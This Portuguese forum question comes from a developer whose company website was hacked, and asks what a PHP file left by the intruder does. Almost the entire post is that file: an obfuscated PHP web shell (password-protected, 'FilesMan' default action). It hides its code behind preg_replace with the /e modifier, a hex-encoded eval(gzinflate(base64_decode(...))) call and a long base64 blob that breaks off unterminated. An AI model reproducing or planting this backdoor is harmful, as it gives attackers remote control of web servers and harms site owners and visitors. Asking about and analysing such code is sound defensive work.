# O que o código abaixo (escrito por um cracker) faz?

Tags: php, cracker

Hoje um dos sites da empresa na qual trabalho foi hackeado, assim como vários outros que estão com métodos arcaicos de desenvolvimento e cheios de falhas de segurança...

A pessoa que invadiu deixou além de uma index modificada o seguinte código em um outro arquivo e me interessei em entender o por que?

```
<?php #v2.3     //Version
$auth_pass = "b832229b8878777455aa47c155d592d7";    //MD5 Encrypted password here
$color = "#5BC236"; //Colour
$default_action = "FilesMan";
$default_charset = "Windows-1251";
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'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